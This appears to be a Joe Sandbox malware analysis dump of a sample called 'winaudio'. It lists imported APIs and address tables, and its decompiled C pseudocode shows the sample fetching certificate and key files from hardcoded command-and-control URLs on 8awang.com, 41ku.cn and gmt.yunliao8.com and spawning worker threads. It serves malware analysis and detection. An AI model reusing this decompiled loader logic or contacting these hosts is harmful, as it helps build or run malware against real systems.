                        0x00346710
                        0x00346718
                        0x0034671b
                        0x0034671b
                        0x00346721
                        0x00346728
                        0x00346739
                        0x0034673d
                        0x0034674b
                        0x00346759
                        0x00346767
                        0x0034676d
                        0x00346775
                        0x00346777
                        0x00346779
                        0x00346784
                        0x00346789
                        0x0034678c
                        0x0034679a
                        0x0034679f
                        0x0034679f
                        0x003467a2
                        0x003467aa
                        0x003467ac
                        0x003467b6
                        0x003467bb
                        0x003467c2
                        0x003467c7
                        0x003467cf
                        0x003467db
                        0x003467e0
                        0x003467e0
                        0x003467bb
                        0x003467e3
                        0x003467eb
                        0x003467f4
                        0x003467ff
                        0x00346804
                        0x0034680c
                        0x0034681a
                        0x0034681f
                        0x0034681f
                        0x00346823
                        0x00346823
                        0x0034673d
                        0x00346830
                        0x00346d0d
                        0x00346d0d
                        0x00346d19
                        0x00346d24
                        0x00346d29
                        0x00346d31
                        0x00346d3f
                        0x00346d4d
                        0x00346d58
                        0x00346d5d
                        0x00346d65
                        0x00346d73
                        0x00346d83
                        0x00346d8c
                        0x00346d9b
                        0x00346836
                        0x00346838
                        0x00346843
                        0x0034684c
                        0x0034685a
                        0x00346868
                        0x00346876
                        0x00346884
                        0x00346886
                        0x00346899
                        0x003468ac
                        0x003468bf
                        0x003468d2
                        0x003468e5
                        0x003468f8
                        0x0034690b
                        0x0034690d
                        0x0034691b
                        0x00346d01
                        0x00346d07
                        0x00000000
                        0x00346999
                        0x0034699d
                        0x0034699f
                        0x003469a1
                        0x003469aa
                        0x00000000
                        0x00000000
                        0x003469b0
                        0x003469b3
                        0x003469b7
                        0x003469be
                        0x003469cb
                        0x003469cf
                        0x003469cf
                        0x003469e2
                        0x00346b43
                        0x00346b43
                        0x00346b54
                        0x00346b5c
                        0x00346b56
                        0x00346b58
                        0x00346b58
                        0x00346b77
                        0x00346bd7
                        0x00346bd7
                        0x00346be8
                        0x00346bec
                        0x00346bec
                        0x00346bf4
                        0x00346bf5
                        0x00346c03
                        0x00346c5c
                        0x00346c5c
                        0x00346c6d
                        0x00346c71
                        0x00346c71
                        0x00346c79
                        0x00346c7a
                        0x00346c88
                        0x00346ce7
                        0x00346ce7
                        0x00346ced
                        0x00346cf5
                        0x00346cfb
                        0x00346cf7
                        0x00346cf7
                        0x00346cf7
                        0x00000000
                        0x00346c8a
                        0x00346c8a
                        0x00346c90
                        0x00346c95
                        0x00346c9a
                        0x00346ca2
                        0x00346cb4
                        0x00346cb9
                        0x00346cc2
                        0x00346cc3
                        0x00346ccf
                        0x00000000
                        0x00346c90
                        0x00346c05
                        0x00346c05
                        0x00346c0a
                        0x00346c0f
                        0x00346c17
                        0x00346c29
                        0x00346c2e
                        0x00346c37
                        0x00346c38
                        0x00346c44
                        0x00000000
                        0x00346c05
                        0x00346b80
                        0x00346b80
                        0x00346b85
                        0x00346b8a
                        0x00346b92
                        0x00346ba4
                        0x00346ba9
                        0x00346bb2
                        0x00346bb3
                        0x00346bbf
                        0x00000000
                        0x00346b80
                        0x003469e8
                        0x003469e8
                        0x003469ed
                        0x003469f3
                        0x003469f8
                        0x003469fd
                        0x00346a05
                        0x00346a11
                        0x00346a16
                        0x00346a19
                        0x00346a1a
                        0x00346a21
                        0x00346a24
                        0x00346a2b
                        0x00346a32
                        0x00346a3c
                        0x00346a5b
                        0x00000000
                        0x00000000
                        0x00346a5d
                        0x00346a62
                        0x00346a70
                        0x00346a75
                        0x00346a7a
                        0x00346a82
                        0x00346a94
                        0x00346a99
                        0x00346aab
                        0x00000000
                        0x00000000
                        0x00346ac5
                        0x00346ac6
                        0x00346ace
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00346ace
                        0x00346ad0
                        0x00346ad6
                        0x00346ad6
                        0x00346ad7
                        0x00346b1f
                        0x00000000
                        0x003469f3
                        0x003469e2
                        0x0034691b

                        APIs
                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0034647F
                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00346488
                        • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00346495
                        • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 003464CF
                        • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 003464E2
                        • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00346514
                        • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00346568
                        • FreeLibrary.KERNEL32(?), ref: 003465AC
                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 003465BC
                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 003465CA
                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 003465D8
                        • FreeLibrary.KERNEL32(00000000), ref: 0034671B
                        • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00346733
                        • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00346749
                        • GetProcAddress.KERNEL32(00000000,GetCursorInfo), ref: 00346757
                        • GetProcAddress.KERNEL32(00000000,GetQueueStatus), ref: 00346765
                        • FreeLibrary.KERNEL32(00000000), ref: 00346823
                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0034684A
                        • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 00346858
                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00346866
                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00346874
                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00346882
                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00346897
                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 003468AA
                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 003468BD
                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 003468D0
                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 003468E3
                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 003468F6
                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00346909
                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0034699D
                        • GetTickCount.KERNEL32 ref: 003469CD
                        • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 003469DA
                        • Heap32First.KERNEL32(00000024,?,?), ref: 00346A53
                        • Heap32Next.KERNEL32(?,?,?,?,?,847B54EE), ref: 00346AA3
                        • GetTickCount.KERNEL32 ref: 00346AB6
                        • Heap32ListNext.KERNEL32(?,?), ref: 00346B19
                        • GetTickCount.KERNEL32 ref: 00346B2C
                        • GetTickCount.KERNEL32 ref: 00346B56
                        • Process32First.KERNEL32(?,00000128), ref: 00346B6F
                        • GetTickCount.KERNEL32 ref: 00346BCC
                        • GetTickCount.KERNEL32 ref: 00346BEA
                        • GetTickCount.KERNEL32 ref: 00346C51
                        • GetTickCount.KERNEL32 ref: 00346C6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32
                        • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                        • API String ID: 336729449-1723836103
                        • Opcode ID: 4ec37b2822ff127f427fcb4a772454e9d1adb0b64413223868f051d74f7aea94
                        • Instruction ID: 76c463a0d6c54f10a9498ef62a014ba75571f6ac9898d6def0ab19db897affb0
                        • Opcode Fuzzy Hash: 4ec37b2822ff127f427fcb4a772454e9d1adb0b64413223868f051d74f7aea94
                        • Instruction Fuzzy Hash: 49325BB0E006299BDF229F64CC45BEDB6B8EF45704F4141E9E608EA191DB70AEC4CF59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DB4A0 Relevance: 61.7, APIs: 20, Strings: 15, Instructions: 487threadregistrysleepCOMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 168 2db4a0-2db564 call 37e1a0 * 4 call 2ddb40 call 2d34e0 call 2d2860 call 2d5a90 185 2db566-2db57a 168->185 186 2db5e3-2db5fe call 2d7700 168->186 188 2db57c-2db594 call 2d2360 call 2d22f0 185->188 189 2db599-2db5c5 185->189 195 2db600-2db607 186->195 188->189 190 2db5ce-2db5de call 2dbc70 189->190 191 2db5c7-2db5c8 CloseHandle 189->191 203 2dbc49-2dbc64 call 2e056d 190->203 191->190 198 2db60d-2db614 195->198 199 2dbb27-2dbb35 195->199 204 2db624-2db63a GetModuleFileNameA 198->204 205 2db616-2db622 Sleep 198->205 201 2dbb54-2dbbf3 call 2d22f0 * 2 WaitForSingleObject call 2d5a00 call 2d9320 199->201 202 2dbb37-2dbb4a call 380508 199->202 246 2dbbf5-2dbc18 GetModuleFileNameA WinExec 201->246 247 2dbc26-2dbc28 201->247 202->201 208 2dbb25 GetLastError 204->208 209 2db640-2db6a5 call 383728 call 2dc9b0 SetCurrentDirectoryA 204->209 205->204 208->199 209->208 219 2db6ab-2db6ad 209->219 221 2db6dc-2db706 RegOpenKeyExA 219->221 222 2db6af-2db6cb CreateMutexA GetLastError 219->222 226 2db708-2db74e call 37e1a0 RegQueryValueExA 221->226 227 2db771-2db79f call 2daad0 221->227 224 2dbc31-2dbc47 call 2d3580 call 2dbc70 222->224 225 2db6d1-2db6d6 222->225 224->203 225->221 229 2dbc2a-2dbc2b CloseHandle 225->229 239 2db765-2db76b RegCloseKey 226->239 240 2db750-2db760 226->240 241 2db7a0-2db7a5 227->241 229->224 239->227 240->239 241->241 245 2db7a7-2db7ac 241->245 245->199 248 2db7b2-2db7e7 call 2dabe0 call 2db3c0 245->248 246->247 247->224 247->229 248->199 253 2db7ed-2db832 call 37e1a0 call 2d5bf0 DeleteFileA 248->253 258 2db834-2db83b 253->258 259 2db850-2db857 253->259 258->259 260 2db83d-2db846 call 380508 258->260 261 2db859-2db860 259->261 262 2db875-2db87c 259->262 260->259 261->262 266 2db862-2db86b call 380508 261->266 263 2db87e-2db885 262->263 264 2db89a-2db8bd call 38382b call 38379a call 383779 262->264 263->264 268 2db887-2db890 call 380508 263->268 279 2db8bf-2db8c2 264->279 280 2db8d2 264->280 266->262 268->264 282 2db8cb-2db8d0 279->282 283 2db8c4-2db8c9 279->283 281 2db8d7-2db90e call 3802fe call 379320 280->281 281->195 288 2db914-2db95c call 379320 281->288 282->281 283->281 288->195 291 2db962-2db991 call 379320 288->291 291->195 294 2db997-2db9c8 call 2de750 291->294 294->195 297 2db9ce-2db9f8 294->297 297->195 298 2db9fe-2dba06 297->298 299 2dba08-2dba25 CreateThread 298->299 300 2dba2b-2dba4a ResumeThread 298->300 299->300 300->195 301 2dba50-2dba61 300->301 301->195 302 2dba67-2dba6f 301->302 303 2dba96-2dbab5 ResumeThread 302->303 304 2dba71-2dba90 CreateThread 302->304 303->195 305 2dbabb-2dbafe call 381153 303->305 304->303 305->199 308 2dbb00-2dbb06 305->308 308->195 309 2dbb0c 308->309 310 2dbb10-2dbb1e Sleep 309->310 310->310 311 2dbb20 310->311 311->195
                        C-Code - Quality: 91%
                        			E002DB4A0(void* __ebx, signed int __edx, void* __edi, void* __eflags) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v88;
				char _v348;
				char _v608;
				char _v868;
				char _v1128;
				char _v1388;
				void* _v1927;
				signed int _v1928;
				long _v1932;
				void* _v1936;
				void _v1940;
				char _v1941;
				char _v1947;
				signed int _v1948;
				long _v1952;
				void* _v1956;
				void _v1960;
				void* _v1964;
				int _v1968;
				void* _v1972;
				struct _SECURITY_ATTRIBUTES* _v1976;
				int _v1980;
				void* __esi;
				signed int _t90;
				signed int _t91;
				void* _t105;
				void* _t107;
				signed int _t110;
				void* _t111;
				signed int _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t139;
				void* _t151;
				void* _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				void* _t158;
				void* _t160;
				signed int _t161;
				void* _t162;
				signed int _t163;
				intOrPtr _t166;
				void* _t167;
				void* _t174;
				void* _t175;
				void* _t176;
				signed int _t179;
				void* _t182;
				void* _t184;
				signed int _t185;
				void* _t186;
				signed int _t187;
				void* _t190;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;
				void* _t197;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t203;
				signed int _t204;
				signed int _t205;
				void* _t206;
				signed int _t207;
				signed int _t208;
				void* _t209;
				void* _t223;
				intOrPtr _t225;
				void* _t228;
				long _t229;
				signed int _t230;
				signed int _t232;
				void* _t235;
				intOrPtr _t242;
				intOrPtr* _t259;
				signed int _t263;
				void* _t264;
				signed int _t265;
				intOrPtr _t273;
				void* _t276;
				void* _t277;
				signed int _t278;
				void* _t279;
				intOrPtr _t280;
				void* _t281;
				void* _t283;
				void* _t284;
				void* _t286;

				_t286 = __eflags;
				_t272 = __edi;
				_t271 = __edx;
				_push(0xffffffff);
				_push(0x39cafc);
				_push( *[fs:0x0]);
				_t280 = _t279 - 0x7ac;
				_t90 =  *0x3e1008; // 0x847b54ee
				_t91 = _t90 ^ _t278;
				_v24 = _t91;
				_push(__ebx);
				_push(__edi);
				_push(_t91);
				 *[fs:0x0] =  &_v16;
				_v20 = _t280;
				E0037E1A0(__edi,  &_v348, 0, 0x104);
				E0037E1A0(_t272,  &_v608, 0, 0x104);
				E0037E1A0(_t272,  &_v868, 0, 0x104);
				E0037E1A0(_t272,  &_v1128, 0, 0x104);
				_t281 = _t280 + 0x30;
				E002DDB40(_t272, _t286);
				_t245 =  &_v1960;
				_v8 = 0;
				_v1941 = 1;
				E002D34E0( &_v1960, _t272); // executed
				_v8 = 2;
				_t276 = 0;
				_v1972 = 0;
				_v1976 = 0;
				E002D2860();
				_t105 = E002D5A90();
				if(_t105 != 0) {
					E002D7700( &_v1960); // executed
					_t273 =  *0x39e0a8;
					_t242 =  *0x39e0fc;
					 *0x3f0830 = 0x7ff7;
					while(1) {
						__eflags =  *0x3f0835;
						if( *0x3f0835 != 0) {
							break;
						}
						__eflags = _v1941;
						if(_v1941 == 0) {
							_v1941 = 0;
							Sleep(0x493e0);
						}
						_t139 = GetModuleFileNameA(0,  &_v348, 0x104);
						__eflags = _t139;
						if(_t139 == 0) {
							L54:
							GetLastError();
							break;
						} else {
							E00383728( &_v348,  &_v868, 0x104,  &_v608, 0x104,  &_v1128, 0x104, 0, 0);
							_push( &_v608);
							E002DC9B0(_t245,  &_v348, "%s%s",  &_v868);
							_t281 = _t281 + 0x34;
							_t151 = SetCurrentDirectoryA( &_v348); // executed
							__eflags = _t151;
							if(_t151 == 0) {
								goto L54;
							}
							__eflags = _t276;
							if(_t276 != 0) {
								L15:
								_v1964 = 0;
								_t153 = RegOpenKeyExA(0x80000001, "Console", 0, 0x20019,  &_v1964); // executed
								__eflags = _t153;
								if(_t153 == 0) {
									_v1968 = _t153;
									E0037E1A0(_t273,  &_v88, _t153, 0x40);
									_t281 = _t281 + 0xc;
									_v1980 = 0x40;
									_t223 = RegQueryValueExA(_v1964, "WindowTag", 0,  &_v1968,  &_v88,  &_v1980); // executed
									__eflags = _t223;
									if(_t223 == 0) {
										_t225 =  *0x3eba80; // 0xb53
										__eflags = _v1968 - 4;
										_t226 =  ==  ? _v88 : _t225;
										 *0x3eba80 =  ==  ? _v88 : _t225;
									}
									RegCloseKey(_v1964);
								}
								_t154 =  *0x3ebb90; // 0x4
								_t155 = _t154 + 2;
								__eflags = _t155 - 0x1490;
								_t156 =  >  ? 0 : _t155;
								 *0x3ebb90 = _t156;
								_t158 = _t156 & 0x00000019 | 0x000000e0;
								__eflags = _t158;
								 *0x3f0830 = _t158;
								_t259 = E002DAAD0();
								_t48 = _t259 + 1; // 0x1
								_t271 = _t48;
								do {
									_t160 =  *_t259;
									_t259 = _t259 + 1;
									__eflags = _t160;
								} while (_t160 != 0);
								__eflags = _t259 - _t271 - 1;
								if(_t259 - _t271 < 1) {
									break;
								}
								_t161 =  *0x3ebbc0; // 0x4
								_t162 = _t161 + 2;
								__eflags = _t162 - 0x1490;
								_t163 =  >  ? 0 : _t162;
								 *0x3ebbc0 = _t163;
								 *0x3f0830 = _t163 & 0x00000019 | 0x000000e0; // executed
								_t166 = E002DABE0(_t242, 0, _t271, _t273, _t162 - 0x1490); // executed
								 *0x3eba84 = _t166; // executed
								_t167 = E002DB3C0(); // executed
								__eflags = _t167;
								if(_t167 != 0) {
									break;
								}
								E0037E1A0(_t273,  &_v1388, 0, 0x104);
								E002D5BF0(0,  &_v1388, 0x104, "C:\\Windows\\Temp\\%s", "vmware24A.dat");
								_t283 = _t281 + 0x1c;
								DeleteFileA( &_v1388);
								_t174 =  *0x3f0870; // 0x1198cd0
								__eflags = _t174;
								if(_t174 != 0) {
									__eflags =  *0x3f0980;
									if( *0x3f0980 != 0) {
										L00380508(_t174);
										_t283 = _t283 + 4;
										 *0x3f0980 = 0;
									}
								}
								_t175 =  *0x3f0984; // 0x11a3f08
								__eflags = _t175;
								if(_t175 != 0) {
									__eflags =  *0x3f0988;
									if( *0x3f0988 != 0) {
										L00380508(_t175);
										_t283 = _t283 + 4;
										 *0x3f0988 = 0;
									}
								}
								_t176 =  *0x3f0868; // 0x11a4908
								__eflags = _t176;
								if(__eflags != 0) {
									__eflags =  *0x3f086c;
									if(__eflags != 0) {
										L00380508(_t176);
										_t283 = _t283 + 4;
										 *0x3f086c = 0;
									}
								}
								E0038379A(0, E0038382B(0, _t271, __eflags, 0));
								_t284 = _t283 + 8;
								_t179 = E00383779(0);
								asm("cdq");
								_t245 = 3;
								_t271 = _t179 % 3;
								_t182 = _t179 % 0x00000003 & 0x000000ff;
								__eflags = _t182;
								if(_t182 == 0) {
									_push("http://8awang.com:10100/plusxyzs");
								} else {
									__eflags = _t182 == 1;
									if(_t182 == 1) {
										_push("http://41ku.cn:10100/plusxyzs");
									} else {
										_push("http://gmt.yunliao8.com:10100/plusxyzs");
									}
								}
								_push(0x104);
								_push("http://41ku.cn:10100/plusxyzs");
								E003802FE();
								_t184 = E00379320(_t242, _t271, _t273, "http://41ku.cn:10100/plusxyzs", "server.crt", 0, 0x3f0870, 0x3f0980, "si-2n*8o_5brl-kq"); // executed
								_t281 = _t284 + 0x24;
								__eflags = _t184;
								if(_t184 != 0) {
									_t185 =  *0x3ebbc8; // 0x0
									_t245 = 0;
									_t186 = _t185 + 2;
									__eflags = _t186 - 0x1490;
									_t187 =  >  ? 0 : _t186;
									 *0x3ebbc8 = _t187;
									 *0x3f0830 = _t187 & 0x00000019 | 0x000000e0; // executed
									_t190 = E00379320(_t242, _t271, _t273, "http://41ku.cn:10100/plusxyzs", "server.key", 0, 0x3f0984, 0x3f0988, "si-2n*8o_5brl-kq"); // executed
									_t281 = _t281 + 0x18;
									__eflags = _t190;
									if(_t190 == 0) {
										continue;
									}
									 *0x3f0830 = 0x7ff7; // executed
									_t191 = E00379320(_t242, _t271, _t273, "http://41ku.cn:10100/plusxyzs", "server.der", 0, 0x3f0868, 0x3f086c, "si-2n*8o_5brl-kq"); // executed
									_t281 = _t281 + 0x18;
									__eflags = _t191;
									if(_t191 == 0) {
										continue;
									}
									_t192 =  *0x3ebb88; // 0x0
									_t193 = _t192 + 2;
									__eflags = _t193 - 0x1490;
									_t194 =  >  ? 0 : _t193;
									_t245 =  &_v1940;
									 *0x3ebb88 = _t194;
									 *0x3f0830 = _t194 & 0x00000019 | 0x000000e0; // executed
									_t197 = E002DE750(_t242,  &_v1940, _t271, _t273); // executed
									__eflags = _t197;
									if(_t197 == 0) {
										continue;
									}
									_t198 =  *0x3ebc0c; // 0x0
									_t245 = 0;
									_t199 = _t198 + 2;
									__eflags = _t199 - 0x1490;
									_t200 =  >  ? 0 : _t199;
									 *0x3ebc0c = _t200;
									 *0x3f0830 = _t200 & 0x00000019 | 0x000000e0;
									__eflags = _v1927;
									if(_v1927 != 0) {
										continue;
									}
									_t203 = _v1936;
									__eflags = _t203;
									if(_t203 == 0) {
										_t203 = CreateThread(0, 0, E002D2270,  &_v1940, 4,  &_v1932); // executed
										_v1936 = _t203;
									}
									 *0x3f0830 = 0x7ff7; // executed
									_t204 = ResumeThread(_t203); // executed
									__eflags = _t204 - 0xffffffff;
									_t205 = _t204 & 0xffffff00 | _t204 != 0xffffffff;
									_v1928 = _t205;
									__eflags = _t205;
									if(_t205 != 0) {
										__eflags = _v1947;
										 *0x3f0830 = 0x7ff7;
										if(_v1947 != 0) {
											continue;
										}
										_t206 = _v1956;
										__eflags = _t206;
										if(_t206 == 0) {
											_t206 = CreateThread(0, 0, E002D2270,  &_v1960, 4,  &_v1952); // executed
											_v1956 = _t206;
										}
										 *0x3f0830 = 0x7ff7; // executed
										_t207 = ResumeThread(_t206); // executed
										__eflags = _t207 - 0xffffffff;
										_t208 = _t207 & 0xffffff00 | _t207 != 0xffffffff;
										_v1948 = _t208;
										__eflags = _t208;
										if(_t208 != 0) {
											_t209 = E00381153(_t245, _t271, E002DAC90, 0, 0);
											_t263 =  *0x3ebbd0; // 0x0
											_t271 = 0;
											_t264 = _t263 + 2;
											_v1972 = _t209;
											_t281 = _t281 + 0xc;
											__eflags = _t264 - 0x1490;
											_t265 =  >  ? 0 : _t264;
											 *0x3ebbd0 = _t265;
											_t245 = _t265 & 0x00000019 | 0x000000e0;
											 *0x3f0830 = _t265 & 0x00000019 | 0x000000e0;
											__eflags = _t209 - 0xffffffff;
											if(_t209 == 0xffffffff) {
												break;
											}
											__eflags =  *0x3f0835 - _t271; // 0x0
											if(__eflags != 0) {
												continue;
											}
											do {
												Sleep(0x3e8); // executed
												__eflags =  *0x3f0835;
											} while ( *0x3f0835 == 0);
										}
									}
								}
								continue;
							}
							_t228 = CreateMutexA(_t276, 1,  &_v1128); // executed
							_t276 = _t228;
							_v1976 = _t276;
							_t229 = GetLastError();
							__eflags = _t276;
							if(_t276 == 0) {
								L61:
								E002D3580( &_v1960);
								E002DBC70( &_v1940);
								__eflags = 0;
								goto L62;
							}
							__eflags = _t229 - 0xb7;
							if(_t229 == 0xb7) {
								L60:
								CloseHandle(_t276);
								goto L61;
							}
							goto L15;
						}
					}
					_t107 =  *0x3f097c; // 0x3b69fc8
					 *0x3f0835 = 1;
					__eflags = _t107;
					if(_t107 != 0) {
						L00380508(_t107);
						 *0x3f097c = 0;
						 *0x3f0874 = 0;
					}
					 *((intOrPtr*)(_v1940 + 4))();
					_t110 =  *0x3ebc40; // 0x6556
					_t111 = _t110 + 2;
					__eflags = _t111 - 0x1490;
					_t112 =  >  ? 0 : _t111;
					 *0x3ebc40 = _t112;
					 *0x3f0830 = _t112 & 0x00000019 | 0x000000e0;
					E002D22F0( &_v1940);
					_t116 =  *0x3ebac8; // 0x6556
					_t117 = _t116 + 2;
					__eflags = _t117 - 0x1490;
					_t118 =  >  ? 0 : _t117;
					 *0x3ebac8 = _t118;
					 *0x3f0830 = _t118 & 0x00000019 | 0x000000e0;
					 *((intOrPtr*)(_v1960 + 4))();
					E002D22F0( &_v1960);
					WaitForSingleObject(_v1972, 0xffffff);
					E002D5A00();
					E002D9320();
					__eflags =  *0x3f0836;
					if( *0x3f0836 != 0) {
						GetModuleFileNameA(0,  &_v348, 0x104);
						WinExec( &_v348, 0);
					}
					__eflags = _t276;
					if(_t276 == 0) {
						goto L61;
					} else {
						goto L60;
					}
				} else {
					_v8 = 3;
					_v1960 = 0x3dce9c;
					if(_v1948 != _t105) {
						_v1947 = 1;
						E002D2360( &_v1960);
						E002D22F0( &_v1960);
					}
					_t230 =  *0x3eb504; // 0x6556
					_t232 =  >  ? 0 : _t230 + 2;
					 *0x3eb504 = _t232;
					 *0x3f0830 = _t232 & 0x00000019 | 0x000000e0;
					_t235 = _v1956;
					if(_t235 != 0) {
						CloseHandle(_t235);
					}
					E002DBC70( &_v1940);
					L62:
					 *[fs:0x0] = _v16;
					_pop(_t277);
					return E002E056D(_v24 ^ _t278, _t271, _t277);
				}
			}




































































































                        0x002db4a0
                        0x002db4a0
                        0x002db4a0
                        0x002db4a3
                        0x002db4a5
                        0x002db4b0
                        0x002db4b1
                        0x002db4b7
                        0x002db4bc
                        0x002db4be
                        0x002db4c1
                        0x002db4c3
                        0x002db4c4
                        0x002db4c8
                        0x002db4ce
                        0x002db4df
                        0x002db4f2
                        0x002db505
                        0x002db518
                        0x002db51d
                        0x002db526
                        0x002db52b
                        0x002db531
                        0x002db538
                        0x002db53f
                        0x002db546
                        0x002db54a
                        0x002db54c
                        0x002db552
                        0x002db558
                        0x002db55d
                        0x002db564
                        0x002db5e3
                        0x002db5e8
                        0x002db5ee
                        0x002db5f4
                        0x002db600
                        0x002db600
                        0x002db607
                        0x00000000
                        0x00000000
                        0x002db60d
                        0x002db614
                        0x002db61b
                        0x002db622
                        0x002db622
                        0x002db632
                        0x002db638
                        0x002db63a
                        0x002dbb25
                        0x002dbb25
                        0x00000000
                        0x002db640
                        0x002db66f
                        0x002db67a
                        0x002db68e
                        0x002db693
                        0x002db69d
                        0x002db6a3
                        0x002db6a5
                        0x00000000
                        0x00000000
                        0x002db6ab
                        0x002db6ad
                        0x002db6dc
                        0x002db6e2
                        0x002db6fe
                        0x002db704
                        0x002db706
                        0x002db70b
                        0x002db715
                        0x002db71a
                        0x002db71d
                        0x002db746
                        0x002db74c
                        0x002db74e
                        0x002db750
                        0x002db755
                        0x002db75c
                        0x002db760
                        0x002db760
                        0x002db76b
                        0x002db76b
                        0x002db771
                        0x002db778
                        0x002db77b
                        0x002db780
                        0x002db783
                        0x002db78b
                        0x002db78b
                        0x002db790
                        0x002db79a
                        0x002db79c
                        0x002db79c
                        0x002db7a0
                        0x002db7a0
                        0x002db7a2
                        0x002db7a3
                        0x002db7a3
                        0x002db7a9
                        0x002db7ac
                        0x00000000
                        0x00000000
                        0x002db7b2
                        0x002db7b9
                        0x002db7bc
                        0x002db7c1
                        0x002db7c4
                        0x002db7d1
                        0x002db7d6
                        0x002db7db
                        0x002db7e0
                        0x002db7e5
                        0x002db7e7
                        0x00000000
                        0x00000000
                        0x002db7fb
                        0x002db816
                        0x002db81b
                        0x002db825
                        0x002db82b
                        0x002db830
                        0x002db832
                        0x002db834
                        0x002db83b
                        0x002db83e
                        0x002db843
                        0x002db846
                        0x002db846
                        0x002db83b
                        0x002db850
                        0x002db855
                        0x002db857
                        0x002db859
                        0x002db860
                        0x002db863
                        0x002db868
                        0x002db86b
                        0x002db86b
                        0x002db860
                        0x002db875
                        0x002db87a
                        0x002db87c
                        0x002db87e
                        0x002db885
                        0x002db888
                        0x002db88d
                        0x002db890
                        0x002db890
                        0x002db885
                        0x002db8a2
                        0x002db8a7
                        0x002db8aa
                        0x002db8af
                        0x002db8b0
                        0x002db8b5
                        0x002db8ba
                        0x002db8ba
                        0x002db8bd
                        0x002db8d2
                        0x002db8bf
                        0x002db8bf
                        0x002db8c2
                        0x002db8cb
                        0x002db8c4
                        0x002db8c4
                        0x002db8c4
                        0x002db8c2
                        0x002db8d7
                        0x002db8dc
                        0x002db8e1
                        0x002db904
                        0x002db909
                        0x002db90c
                        0x002db90e
                        0x002db914
                        0x002db919
                        0x002db91b
                        0x002db923
                        0x002db92d
                        0x002db935
                        0x002db94d
                        0x002db952
                        0x002db957
                        0x002db95a
                        0x002db95c
                        0x00000000
                        0x00000000
                        0x002db97d
                        0x002db987
                        0x002db98c
                        0x002db98f
                        0x002db991
                        0x00000000
                        0x00000000
                        0x002db997
                        0x002db99e
                        0x002db9a1
                        0x002db9a6
                        0x002db9a9
                        0x002db9af
                        0x002db9bc
                        0x002db9c1
                        0x002db9c6
                        0x002db9c8
                        0x00000000
                        0x00000000
                        0x002db9ce
                        0x002db9d3
                        0x002db9d5
                        0x002db9d8
                        0x002db9dd
                        0x002db9e0
                        0x002db9ed
                        0x002db9f2
                        0x002db9f8
                        0x00000000
                        0x00000000
                        0x002db9fe
                        0x002dba04
                        0x002dba06
                        0x002dba1f
                        0x002dba25
                        0x002dba25
                        0x002dba2c
                        0x002dba36
                        0x002dba3c
                        0x002dba3f
                        0x002dba42
                        0x002dba48
                        0x002dba4a
                        0x002dba50
                        0x002dba57
                        0x002dba61
                        0x00000000
                        0x00000000
                        0x002dba67
                        0x002dba6d
                        0x002dba6f
                        0x002dba8a
                        0x002dba90
                        0x002dba90
                        0x002dba97
                        0x002dbaa1
                        0x002dbaa7
                        0x002dbaaa
                        0x002dbaad
                        0x002dbab3
                        0x002dbab5
                        0x002dbac4
